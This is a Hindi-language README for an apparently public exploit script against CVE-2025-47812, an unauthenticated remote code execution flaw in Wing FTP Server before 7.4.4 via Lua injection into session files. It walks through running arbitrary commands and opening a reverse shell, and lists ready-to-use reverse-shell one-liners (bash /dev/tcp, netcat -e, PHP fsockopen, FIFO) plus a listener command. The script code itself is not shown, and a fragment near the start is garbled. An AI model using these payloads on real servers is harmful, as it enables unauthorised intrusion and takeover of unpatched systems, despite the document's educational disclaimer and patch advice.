
Wing FTP सर्वर < 7.4.4 के लिए अनधिकृत रिमोट कोड निष्पादन एक्सप्लॉइट, सत्र फ़ाइलों में Lua इंजेक्शन के माध्यम से कमांड निष्पादन और रिवर्स शेल सक्षम करना।
CVE-2025-47812 - Wing FTP Server रिमोट कोड एक्जीक्यूशन (RCE)
===========================================================
लेखक: blindma1den
दिनांक: जुलाई 2025
एक्सप्लॉइट प्रकार: रिमोट कोड एक्जीक्यूशन (अप्रमाणित)
लक्ष्य: Wing FTP Server < 7.4.4
CVSS स्कोर: 10.0 (गंभीर)
यह स्क्रिप्ट CVE-2025-47812 का शोषण करती है, जो Wing FTP Server के वेब इंटरफ़ेस में एक गंभीर कमजोरी है, जो रिमोट हमलावरों को प्रमाणीकरण के बिना मनमाने सिस्टम कमांड निष्पादित करने या रिवर्स शेल खोलने की अनुमति देती है।
यह दोष लॉगिन फॉर्म (/loginok.html) में नल बाइट्स (%00) के अनुचित हैंडलिंग के कारण उत्पन्न होता है। यह सत्र फ़ाइलों में Lua कोड इंजेक्शन की अनुमति देता है, जिसे बाद में /dir.html जैसे एंडपॉइंट तक पहुँचने पर मूल्यांकित किया जाता है।
NVD विवरण: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)निर्भरताएँ स्थापित करें:
pip install requests
स्क्रिप्ट चलाएँ:
python3 wingftp_rce_exploit.py
आपसे निम्न के लिए पूछा जाएगा:
[1] कमांड चलाएँ:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] रिवर्स शेल:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
शेल ट्रिगर करने से पहले अपना लिसनर शुरू करें:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
यह कोड केवल शैक्षिक उद्देश्यों के लिए है। इस एक्सप्लॉइट का उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण नहीं है। अनधिकृत उपयोग अवैध और अनैतिक है।
अपने सिस्टम को तुरंत पैच करें। Wing FTP Server 7.4.4 इस कमजोरी को ठीक करता है।
हैप्पी हैकिंग!